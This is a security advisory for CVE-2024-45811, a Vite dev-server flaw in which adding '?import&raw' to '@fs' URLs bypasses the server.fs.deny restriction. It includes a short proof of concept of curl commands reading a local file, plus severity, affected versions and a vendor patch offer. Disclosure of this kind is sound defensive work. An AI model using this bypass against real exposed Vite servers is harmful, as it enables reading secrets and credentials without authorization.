View all vulnerabilities

CVE-2024-45811

Vite's `server.fs.deny` is bypassed when using `?import&raw`

Description

### Summary
The contents of arbitrary files can be returned to the browser.


### Details
`@fs` denies access to files outside of Vite serving allow list. Adding `?import&raw` to the URL bypasses this limitation and returns the file content if it exists.

### PoC
```sh
$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"

   

403 Restricted

The request url "/tmp/secret.txt" is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...
```


Patch Available

Fix available through Seal Security. No upgrade required, protect your application instantly.

Fix without upgrading
Vulnerability Details
Score
5.3
Score Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Affected Versions
vite >= 5.4.0 < 5.4.6; vite >= 5.3.0 < 5.3.6; vite >= 5.2.0 < 5.2.14; vite >= 4.0.0 < 4.5.4; vite < 3.2.11; vite >= 5.0.0 < 5.1.8
Severity
Medium
Medium
Medium
Ecosystem
JavaScript
Publish Date
September 17, 2024
Modified Date
September 19, 2024